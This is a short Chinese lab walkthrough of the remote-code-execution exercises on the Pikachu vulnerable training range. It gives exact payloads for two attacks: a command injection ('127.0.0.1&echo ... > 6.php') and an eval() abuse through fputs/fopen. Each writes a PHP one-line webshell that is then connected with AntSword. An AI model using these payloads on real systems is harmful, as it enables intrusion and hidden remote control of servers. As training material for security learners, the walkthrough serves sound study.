Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
Gofarlic_oms113 小时前
避免Kisssoft高级分析模块过度采购的科学评估方法
大数据·linux·运维·人工智能·matlab
linux kernel13 小时前
第七部分:高级IO
服务器·网络
田井中律.13 小时前
服务器部署问题汇总(ubuntu24.04.3)
运维·服务器
数字护盾(和中)13 小时前
BAS+ATT&CK:企业主动防御的黄金组合
服务器·网络·数据库
大大水瓶13 小时前
HAProxy 从入门到实战:负载均衡与流量管理全解析
运维·负载均衡
小马爱打代码13 小时前
Docker:完全指南从入门到精通
运维·docker·容器
web3.088899913 小时前
获得某红书笔记评论说明-item_review
服务器·前端·数据库
linux kernel13 小时前
第十一部分(下):进程通信
linux·服务器
一名优秀的码农14 小时前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
Libraeking14 小时前
05 安全边界:MCP Server 的权限沙箱与敏感数据保护
安全